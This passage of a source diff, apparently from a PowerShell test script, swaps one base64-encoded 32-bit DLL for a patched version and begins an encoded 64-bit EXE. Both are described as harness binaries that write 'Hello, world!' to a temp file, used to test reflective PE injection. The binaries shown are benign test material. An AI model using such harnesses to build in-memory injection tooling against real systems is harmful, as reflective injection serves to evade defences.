AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXiEAAAAAAAB6IQAAAAAAAIYhAAAAAAAAmCEAAAAAAACsIQAAAAAAAFAhAAAAAAAAAAAAAAAAAAAlVEVNUCUAAEhlbGxvLCB3b3JsZCEAAABzdHJjYXRfcwAAAABudGRsbAAAAAAAAABcdGVzdG91dHB1dC50eHQAAQsDAAsBLAAEMAAAAAAAAAAAAAAAAAAAAAAAAKZ8PlYAAAAAwiAAAAEAAAABAAAAAQAAALggAAC8IAAAwCAAABAQAADkIAAAAABSZWZsZWN0aXZlUEVJbmplY3RUZXN0SGFybmVzcy5kbGwAVm9pZEZ1bmMAAAAAGCEAAAAAAAAAAAAAuiEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF4hAAAAAAAAeiEAAAAAAACGIQAAAAAAAJghAAAAAAAArCEAAAAAAABQIQAAAAAAAAAAAAAAAAAAiABDcmVhdGVGaWxlQQAiAUV4cGFuZEVudmlyb25tZW50U3RyaW5nc0EANAVXcml0ZUZpbGUATAJHZXRQcm9jQWRkcmVzcwAAGwJHZXRNb2R1bGVIYW5kbGVBAABSAENsb3NlSGFuZGxlAEtFUk5FTDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAAJREAAHggAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitVoidDll = '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'
+	$Encoded32BitVoidDll = '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'
 
 	# A bare bones test harness EXE that simply writes "Hello, world! (EXE ARGS)" to %TEMP%\testoutput.txt
 	$Encoded64BitExe = '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AAAAAEwmAAAAAAAAPCYAAAAAAACsJgAAAAAAAAAAAAAAAAAANiUAAAAAAABAJQAAAAAAAFYlAAAAAAAAaiUAAAAAAAB4JQAAAAAAAC4lAAAAAAAAnCUAAAAAAACoJQAAAAAAALIlAAAAAAAAviUAAAAAAADSJQAAAAAAAAQmAAAAAAAADCYAAAAAAAAWJgAAAAAAACQmAAAAAAAAMiYAAAAAAAAmJQAAAAAAABQlAAAAAAAABCUAAAAAAAD2JAAAAAAAAOgkAAAAAAAAhCUAAAAAAAAAAAAAAAAAAIgAQ3JlYXRlRmlsZUEAIgFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBADQFV3JpdGVGaWxlAEwCR2V0UHJvY0FkZHJlc3MAABsCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAFgBX1hjcHRGaWx0ZXIA8gFfYW1zZ19leGl0AACnAV9fZ2V0bWFpbmFyZ3MAzgFfX3NldF9hcHBfdHlwZQAAGAZleGl0AABYAl9leGl0AAoCX2NleGl0AAAaAl9jb25maWd0aHJlYWRsb2NhbGUA0AFfX3NldHVzZXJtYXRoZXJyAADiAl9pbml0dGVybV9lAOECX2luaXR0ZXJtAFwBX19DX3NwZWNpZmljX2hhbmRsZXIAAKgBX19pbml0ZW52AHgCX2Ztb2RlAAAZAl9jb21tb2RlAAAzAT90ZXJtaW5hdGVAQFlBWFhaAJkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAWwNfbG9jawDHBF91bmxvY2sACQJfY2FsbG9jX2Nyd